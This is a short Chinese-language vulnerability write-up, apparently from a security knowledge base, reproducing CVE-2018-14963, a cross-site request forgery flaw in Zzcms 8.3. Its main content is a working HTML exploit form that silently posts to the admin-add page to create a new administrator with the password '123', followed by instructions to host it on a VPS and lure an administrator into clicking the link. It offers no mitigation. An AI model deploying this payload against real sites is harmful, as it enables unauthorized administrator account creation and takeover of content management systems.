menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right (CVE-2018-14963)Zzcms 8.3 csrf chevron_right (CVE-2018-14963)Zzcms 8.3 csrf.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    (CVE-2018-14963)Zzcms 8.3 csrf.md
    1.37 KB / 2021-07-15 20:12:35
        (CVE-2018-14963)Zzcms 8.3 csrf
    ================================
    
    一、漏洞简介
    ------------
    
    二、漏洞影响
    ------------
    
    Zzcms 8.3
    
    三、复现过程
    ------------
    
    csrf漏洞,这个问题也是从上个版本就存在的问题,就是整个管理员后台的,所有表单都是没有设置csrf的token的,所以只要涉及到敏感操作的表单,都可以使用csrf来攻击,达成很多攻击利用。
    
    这里的攻击是产生在了/admin/adminadd.php的添加管理员操作,构造的表单如下:
    
        <html>
          <body>
          <script>history.pushState('', '', '/')</script>
            <form action="http://0-sec.org:8080/admin/adminadd.php?action=add" method="POST">
              <input type="hidden" name="groupid" value="1" />
              <input type="hidden" name="admins" value="123" />
              <input type="hidden" name="passs" value="123" />
              <input type="hidden" name="passs2" value="123" />
              <input type="submit" value="Submit request" />
            </form>
          </body>
        </html>
    
    构造好了payload以后,放到vps上,然后诱导管理员点击恶意链接,即可成功添加管理员。
    
    未添加管理员之前:
    
    ![](./resource/(CVE-2018-14963)Zzcms8.3csrf/media/rId24.png)
    
    点击链接之后:
    
    ![](./resource/(CVE-2018-14963)Zzcms8.3csrf/media/rId25.png)
    
    参考链接
    --------
    
    > <https://www.anquanke.com/post/id/156660>
    
    
    links
    file_download